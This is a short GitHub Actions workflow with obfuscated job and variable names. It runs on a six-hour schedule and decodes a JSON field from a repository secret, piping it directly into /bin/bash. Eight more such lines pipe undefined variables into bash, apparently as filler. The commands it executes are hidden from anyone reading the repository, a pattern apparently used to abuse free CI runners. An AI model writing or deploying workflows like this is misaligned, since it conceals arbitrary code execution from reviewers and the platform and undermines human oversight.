name: donglaopo7654
on:
  workflow_dispatch:
  schedule:
    - cron: '34 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: donglaopo7654
        env:
          egt3099: ${{ secrets.egt3099 }}
        run: |
          echo $egt3099 | jq -r .ckvgh576 | /bin/bash
          echo $k168 | jq -r .pmnff8525 | /bin/bash
          echo $og52 | jq -r .wjf4895 | /bin/bash
          echo $tdgd81726 | jq -r .dpcb7662 | /bin/bash
          echo $lvfdf94 | jq -r .gondd94944 | /bin/bash
          echo $gos07033 | jq -r .br87 | /bin/bash
          echo $cfm6 | jq -r .pio12 | /bin/bash
          echo $fhtui286 | jq -r .f6 | /bin/bash
          echo $lpnmj28845 | jq -r .p89 | /bin/bash

